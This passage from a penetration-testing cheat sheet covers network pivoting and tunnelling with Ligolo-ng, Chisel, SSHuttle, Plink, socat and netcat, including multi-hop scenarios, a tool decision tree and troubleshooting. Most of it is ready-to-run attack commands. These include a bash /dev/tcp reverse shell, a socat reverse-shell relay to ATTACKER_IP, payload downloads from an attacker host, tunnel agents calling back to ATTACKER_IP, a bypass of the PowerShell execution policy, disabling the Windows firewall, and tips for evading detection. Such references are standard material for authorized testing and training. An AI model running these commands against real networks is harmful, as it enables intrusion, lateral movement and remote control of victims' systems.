    967 # View forwards
    968 netsh interface portproxy show all
    969 
    970 # Delete forward
    971 netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0
    972 ```
    973 
    974 ### Scenario 5: Multiple Nested Networks (3+ Hops)
    975 
    976 **Situation:** Attacker -> Host A (10.10.10.5) -> Host B (192.168.1.10) -> Target Network (172.16.0.0/24)
    977 
    978 **Solution: Ligolo-ng Listener Chaining**
    979 ```bash
    980 # Step 1: Connect Agent A to attacker
    981 # On attacker
    982 ./proxy -selfcert -laddr 0.0.0.0:11601
    983 
    984 # On Host A
    985 ./agent -connect ATTACKER_IP:11601 -ignore-cert
    986 
    987 # Step 2: In ligolo console, create listener on Host A for Host B
    988 session 1
    989 listener_add --addr 0.0.0.0:11601 --to ATTACKER_IP:11601
    990 start
    991 
    992 # Step 3: Add route to Host A network
    993 sudo ip route add 192.168.1.0/24 dev ligolo
    994 
    995 # Step 4: From Host B, connect through Host A
    996 ./agent -connect 192.168.1.10:11601 -ignore-cert
    997 
    998 # Step 5: Select Host B session and add route
    999 session 2
   1000 start
   1001 sudo ip route add 172.16.0.0/24 dev ligolo
   1002 
   1003 # Access final target network
   1004 nmap 172.16.0.5
   1005 ```
   1006 
   1007 ### Scenario 6: Catch Reverse Shell Through Tunnel
   1008 
   1009 **Situation:** Need to catch a reverse shell from internal network host (no direct route)
   1010 
   1011 **Solution: Ligolo-ng Listener (Reverse Port Forward)**
   1012 ```bash
   1013 # Setup tunnel to internal network (as usual)
   1014 ./proxy -selfcert -laddr 0.0.0.0:11601
   1015 ./agent -connect ATTACKER_IP:11601 -ignore-cert
   1016 
   1017 # In ligolo console, setup listener
   1018 session 1
   1019 listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444
   1020 start
   1021 
   1022 # On attacker, setup nc listener
   1023 nc -lvnp 4444
   1024 
   1025 # On target internal host, execute reverse shell to agent's IP
   1026 bash -i >& /dev/tcp/AGENT_IP/4444 0>&1
   1027 
   1028 # Shell appears on attacker's nc listener!
   1029 ```
   1030 
   1031 ### Scenario 7: Access Internal Web Application
   1032 
   1033 **Situation:** Internal web app at http://intranet.local (192.168.5.50:80), want to browse from attacker
   1034 
   1035 **Solution 1: Ligolo-ng (Direct Access)**
   1036 ```bash
   1037 # Setup tunnel
   1038 ./proxy -selfcert -laddr 0.0.0.0:11601 -autoroute
   1039 ./agent -connect ATTACKER_IP:11601 -ignore-cert
   1040 
   1041 # Start tunnel
   1042 session 1; start
   1043 
   1044 # Add to /etc/hosts
   1045 echo "192.168.5.50 intranet.local" | sudo tee -a /etc/hosts
   1046 
   1047 # Browse directly
   1048 firefox http://intranet.local
   1049 ```
   1050 
   1051 **Solution 2: Chisel + Browser SOCKS Proxy**
   1052 ```bash
   1053 # Setup chisel
   1054 ./chisel server -p 8080 --reverse
   1055 ./chisel client ATTACKER_IP:8080 R:1080:socks
   1056 
   1057 # Configure Firefox SOCKS proxy:
   1058 # Preferences -> Network Settings -> Manual proxy
   1059 # SOCKS Host: 127.0.0.1, Port: 1080, SOCKS v5
   1060 # Browse to http://192.168.5.50
   1061 ```
   1062 
   1063 ### Scenario 8: RDP to Windows Machine in Internal Network
   1064 
   1065 **Situation:** Windows Server at 10.10.50.10, need RDP access
   1066 
   1067 **Solution 1: Through SOCKS Proxy**
   1068 ```bash
   1069 # Setup Chisel tunnel
   1070 ./chisel server -p 8080 --reverse
   1071 ./chisel client ATTACKER_IP:8080 R:1080:socks
   1072 
   1073 # Use proxychains with RDP client
   1074 proxychains4 xfreerdp /v:10.10.50.10 /u:administrator /p:password /cert-ignore
   1075 ```
   1076 
   1077 **Solution 2: Direct Port Forward**
   1078 ```bash
   1079 # Chisel reverse port forward
   1080 ./chisel client ATTACKER_IP:8080 R:3389:10.10.50.10:3389
   1081 
   1082 # Direct RDP connection
   1083 xfreerdp /v:127.0.0.1:3389 /u:administrator /p:password
   1084 ```
   1085 
   1086 ---
   1087 
   1088 ## Tool Selection Guide
   1089 
   1090 ### When to Use Each Tool
   1091 
   1092 #### Use LIGOLO-NG when:
   1093 - You need full network access (scanning, multiple services)
   1094 - Want transparent access without SOCKS/proxychains
   1095 - Have ability to upload agent binary
   1096 - Need clean, VPN-like experience
   1097 - Working with multiple nested networks
   1098 - Performance matters (faster than SOCKS)
   1099 
   1100 #### Use CHISEL when:
   1101 - Need quick SOCKS proxy setup
   1102 - Working through HTTP-only egress
   1103 - Want to forward specific ports
   1104 - Can't use SSH
   1105 - Need cross-platform support
   1106 - Working on HTB/CTF (widely supported)
   1107 
   1108 #### Use SSHUTTLE when:
   1109 - Target already has SSH running
   1110 - Don't want to upload any tools
   1111 - Need quick, transparent VPN-like access
   1112 - Working on Linux/Mac
   1113 - Want simple solution without agents
   1114 
   1115 #### Use PLINK when:
   1116 - Target is Windows
   1117 - SSH server available on attacker
   1118 - Can't upload other tools (plink is well-known, less suspicious)
   1119 - Need quick reverse tunnel
   1120 - Working with older Windows systems
   1121 
   1122 #### Use SOCAT when:
   1123 - Need encrypted tunnels (OpenSSL)
   1124 - Creating relay points
   1125 - Upgrading reverse shells to TTY
   1126 - Need UDP forwarding
   1127 - Want flexibility for custom scenarios
   1128 
   1129 #### Use NETCAT when:
   1130 - Just need basic port forwarding
   1131 - Creating simple relays
   1132 - Quick file transfers
   1133 - Testing connectivity
   1134 - Available on target (often pre-installed)
   1135 
   1136 #### Use PROXYCHAINS when:
   1137 - Already have SOCKS proxy (Chisel, SSH)
   1138 - Need to route tools that don't support proxies
   1139 - Want to chain multiple proxies
   1140 - Working with scanners/exploit tools
   1141 
   1142 ### Decision Tree
   1143 
   1144 ```
   1145 Do you have SSH access on target?
   1146 ├── YES: Use SSHuttle (simplest) or SSH tunneling
   1147 └── NO: Continue...
   1148 
   1149 Can you upload custom binaries?
   1150 ├── YES: Continue...
   1151 │   ├── Need VPN-like full network access?
   1152 │   │   └── YES: Use Ligolo-ng (best performance)
   1153 │   └── Need SOCKS proxy or port forward?
   1154 │       └── YES: Use Chisel (most versatile)
   1155 └── NO: Continue...
   1156     ├── Windows target?
   1157     │   ├── Plink available? -> Use Plink
   1158     │   └── Use netsh portproxy (built-in)
   1159     └── Linux/Unix target?
   1160         ├── Netcat available? -> Use Netcat relay
   1161         ├── Socat available? -> Use Socat
   1162         └── Bash only? -> Use /dev/tcp relay
   1163 ```
   1164 
   1165 ### Performance Comparison
   1166 
   1167 | Tool | Speed | Latency | Resource Usage | Stealth |
   1168 |------|-------|---------|----------------|---------|
   1169 | Ligolo-ng | Excellent | Low | Low | High |
   1170 | SSHuttle | Very Good | Low | Low | Very High |
   1171 | Chisel | Good | Medium | Low | Medium |
   1172 | SSH Tunnels | Very Good | Low | Low | Very High |
   1173 | Socat | Good | Low | Very Low | High |
   1174 | Netcat | Fair | Medium | Very Low | Medium |
   1175 
   1176 ---
   1177 
   1178 ## Troubleshooting
   1179 
   1180 ### Chisel Issues
   1181 
   1182 **Problem: Client connects but SOCKS proxy doesn't work**
   1183 ```bash
   1184 # Check if server is running with --reverse flag
   1185 ./chisel server -p 8080 --reverse
   1186 
   1187 # Verify SOCKS port is listening on attacker
   1188 ss -tlnp | grep 1080
   1189 
   1190 # Test SOCKS proxy
   1191 curl --socks5 127.0.0.1:1080 http://internal-host
   1192 ```
   1193 
   1194 **Problem: Connection refused / Can't connect**
   1195 ```bash
   1196 # Check firewall on attacker
   1197 sudo ufw allow 8080/tcp
   1198 
   1199 # Verify chisel is listening
   1200 ss -tlnp | grep 8080
   1201 
   1202 # Try different port (maybe 8080 is blocked)
   1203 ./chisel server -p 443 --reverse
   1204 ```
   1205 
   1206 ### Ligolo-ng Issues
   1207 
   1208 **Problem: TUN interface not created**
   1209 ```bash
   1210 # Linux - create manually
   1211 sudo ip tuntap add user $(whoami) mode tun ligolo
   1212 sudo ip link set ligolo up
   1213 
   1214 # Check if interface exists
   1215 ip addr show ligolo
   1216 
   1217 # macOS - install tuntap
   1218 brew install --cask tuntap
   1219 ```
   1220 
   1221 **Problem: Can't add routes / routes not working**
   1222 ```bash
   1223 # Check if tunnel is started
   1224 # In ligolo console: start
   1225 
   1226 # Verify route
   1227 ip route | grep ligolo
   1228 
   1229 # Check if interface is UP
   1230 ip link show ligolo
   1231 
   1232 # Try deleting and re-adding route
   1233 sudo ip route del 10.10.10.0/24 dev ligolo
   1234 sudo ip route add 10.10.10.0/24 dev ligolo
   1235 ```
   1236 
   1237 **Problem: Agent won't connect**
   1238 ```bash
   1239 # Check firewall
   1240 sudo ufw allow 11601/tcp
   1241 
   1242 # Verify proxy is listening
   1243 ss -tlnp | grep 11601
   1244 
   1245 # Try binding to specific IP
   1246 ./proxy -selfcert -laddr 0.0.0.0:11601
   1247 
   1248 # On agent, try explicit bind
   1249 ./agent -connect ATTACKER_IP:11601 -ignore-cert -bind 0.0.0.0
   1250 ```
   1251 
   1252 ### SSH / SSHuttle Issues
   1253 
   1254 **Problem: SSHuttle connection drops**
   1255 ```bash
   1256 # Use --no-latency-control
   1257 sshuttle -r user@host 10.10.10.0/24 --no-latency-control
   1258 
   1259 # Check SSH connection stability
   1260 ssh user@host 'while true; do date; sleep 5; done'
   1261 ```
   1262 
   1263 **Problem: SSH password authentication failed**
   1264 ```bash
   1265 # Enable password auth on SSH server
   1266 sudo vim /etc/ssh/sshd_config
   1267 # Set: PasswordAuthentication yes
   1268 sudo systemctl restart sshd
   1269 ```
   1270 
   1271 ### Proxychains Issues
   1272 
   1273 **Problem: DNS leaks / DNS not working**
   1274 ```bash
   1275 # In /etc/proxychains4.conf, ensure:
   1276 proxy_dns
   1277 
   1278 # Or add to config:
   1279 proxy_dns_old  # Use old method if new one fails
   1280 ```
   1281 
   1282 **Problem: Tool doesn't work with proxychains**
   1283 ```bash
   1284 # Some tools don't support SOCKS proxying
   1285 # Workaround: Use Ligolo-ng or SSHuttle instead
   1286 
   1287 # For nmap, always use:
   1288 proxychains4 nmap -sT -Pn target
   1289 # -sT: TCP connect (required)
   1290 # -Pn: Skip ping (ICMP doesn't work through SOCKS)
   1291 ```
   1292 
   1293 **Problem: "ERROR: ld.so: object 'libproxychains.so.3'"**
   1294 ```bash
   1295 # Find correct library
   1296 find /usr -name "libproxychains*"
   1297 
   1298 # Update config with correct path
   1299 sudo vim /etc/proxychains4.conf
   1300 # Update: /usr/lib/libproxychains4.so (or wherever it is)
   1301 ```
   1302 
   1303 ### Windows Specific Issues
   1304 
   1305 **Problem: PowerShell execution policy blocks scripts**
   1306 ```powershell
   1307 # Bypass execution policy
   1308 powershell -ExecutionPolicy Bypass -File script.ps1
   1309 
   1310 # Or set for current session
   1311 Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
   1312 ```
   1313 
   1314 **Problem: Windows Firewall blocks tunneling tools**
   1315 ```cmd
   1316 # Disable firewall (if you have admin)
   1317 netsh advfirewall set allprofiles state off
   1318 
   1319 # Or add specific rule
   1320 netsh advfirewall firewall add rule name="Chisel" dir=in action=allow program="C:\Temp\chisel.exe"
   1321 ```
   1322 
   1323 **Problem: Plink asks to cache host key (breaks automation)**
   1324 ```cmd
   1325 # Auto-accept with echo
   1326 echo y | plink.exe -R 9999:127.0.0.1:80 user@ATTACKER_IP -pw password
   1327 
   1328 # Or use -batch flag (doesn't prompt)
   1329 plink.exe -batch -R 9999:127.0.0.1:80 user@ATTACKER_IP -pw password
   1330 ```
   1331 
   1332 ### General Networking Issues
   1333 
   1334 **Problem: Can't reach internal network after setting up tunnel**
   1335 ```bash
   1336 # Check routing table
   1337 ip route  # Linux
   1338 route print  # Windows
   1339 netstat -nr  # macOS
   1340 
   1341 # Verify tunnel interface is UP
   1342 ip addr show
   1343 
   1344 # Test connectivity
   1345 ping INTERNAL_IP
   1346 traceroute INTERNAL_IP
   1347 
   1348 # Check if packet forwarding is enabled (Linux)
   1349 sysctl net.ipv4.ip_forward  # Should be 1
   1350 sudo sysctl -w net.ipv4.ip_forward=1
   1351 ```
   1352 
   1353 **Problem: Slow tunnel performance**
   1354 ```bash
   1355 # For SSH-based tunnels, enable compression
   1356 ssh -C -D 1080 user@host
   1357 
   1358 # For Chisel, try different port (avoid port 80/443 if proxy interferes)
   1359 ./chisel server -p 9999 --reverse
   1360 
   1361 # For Ligolo-ng, check MTU settings
   1362 # Reduce MTU if needed
   1363 sudo ip link set ligolo mtu 1400
   1364 ```
   1365 
   1366 **Problem: Firewall blocks outbound connections**
   1367 ```bash
   1368 # Try common allowed ports
   1369 # 80 (HTTP), 443 (HTTPS), 53 (DNS), 22 (SSH)
   1370 
   1371 # Chisel over HTTPS port
   1372 ./chisel server -p 443 --reverse
   1373 
   1374 # Ligolo-ng over HTTPS
   1375 ./proxy -selfcert -laddr 0.0.0.0:443
   1376 
   1377 # SSH over 443
   1378 ssh -p 443 user@host
   1379 ```
   1380 
   1381 ---
   1382 
   1383 ## Quick Command Reference
   1384 
   1385 ### Most Common Commands
   1386 
   1387 ```bash
   1388 # Quick SOCKS proxy with Chisel
   1389 ./chisel server -p 8080 --reverse                  # Attacker
   1390 ./chisel client ATTACKER_IP:8080 R:1080:socks     # Target
   1391 
   1392 # Ligolo-ng full tunnel
   1393 ./proxy -selfcert -laddr 0.0.0.0:11601 -autoroute # Attacker
   1394 ./agent -connect ATTACKER_IP:11601 -ignore-cert   # Target
   1395 # Then: session 1 -> start
   1396 
   1397 # SSHuttle VPN
   1398 sshuttle -r user@pivot 10.0.0.0/8 --dns -vv
   1399 
   1400 # Reverse port forward
   1401 ssh -R 8080:localhost:80 user@attacker            # SSH
   1402 ./chisel client ATTACKER_IP:8080 R:8080:localhost:80  # Chisel
   1403 plink.exe -R 8080:localhost:80 user@attacker -pw pass  # Plink
   1404 
   1405 # Local port forward
   1406 ssh -L 8080:internal-host:80 user@pivot
   1407 ./chisel client ATTACKER_IP:8080 L:8080:internal-host:80
   1408 
   1409 # Dynamic SOCKS
   1410 ssh -D 1080 user@pivot
   1411 ./chisel client ATTACKER_IP:8080 1080:socks
   1412 
   1413 # Using proxychains
   1414 proxychains4 nmap -sT -Pn 10.10.10.0/24
   1415 proxychains4 firefox
   1416 proxychains4 msfconsole
   1417 
   1418 # File transfer
   1419 python3 -m http.server 8000                       # Attacker
   1420 wget http://ATTACKER_IP:8000/file -O /tmp/file    # Target Linux
   1421 iwr http://ATTACKER_IP:8000/file -o C:\Temp\file  # Target Windows
   1422 
   1423 # Reverse shell relay with socat
   1424 socat TCP-LISTEN:4444,fork TCP:ATTACKER_IP:4444   # Pivot
   1425 # Victim connects to pivot:4444
   1426 ```
   1427 
   1428 ---
   1429 
   1430 ## Additional Resources
   1431 
   1432 ### Port Reference
   1433 ```
   1434 Common Tunnel Ports:
   1435 - 11601: Ligolo-ng default
   1436 - 8080: Chisel default (HTTP alternative)
   1437 - 1080: SOCKS proxy standard
   1438 - 8888: Alternative HTTP forward
   1439 - 9050: Tor SOCKS proxy
   1440 - 22: SSH
   1441 ```
   1442 
   1443 ### Testing Connectivity
   1444 ```bash
   1445 # Check if port is open
   1446 nc -zv TARGET_IP PORT
   1447 
   1448 # Check HTTP service
   1449 curl -I http://TARGET_IP:PORT
   1450 
   1451 # Check SOCKS proxy
   1452 curl --socks5 127.0.0.1:1080 http://target
   1453 
   1454 # Test route
   1455 ping TARGET_IP
   1456 traceroute TARGET_IP
   1457 
   1458 # Check listening ports on local
   1459 ss -tlnp          # Linux
   1460 netstat -an | find "LISTEN"  # Windows
   1461 ```
   1462 
   1463 ### Useful Aliases (Add to ~/.bashrc or ~/.zshrc)
   1464 ```bash
   1465 # Quick HTTP server
   1466 alias serve='python3 -m http.server 8000'
   1467 
   1468 # Quick SOCKS with Chisel
   1469 alias chisel-server='~/tools/chisel/chisel server -p 8080 --reverse'
   1470 
   1471 # Proxychains shortcut
   1472 alias pc='proxychains4 -q'
   1473 
   1474 # Quick nmap through proxy
   1475 alias pcnmap='proxychains4 nmap -sT -Pn'
   1476 ```
   1477 
   1478 ---
   1479 
   1480 **Created for Security Testing & Authorized Penetration Testing Only**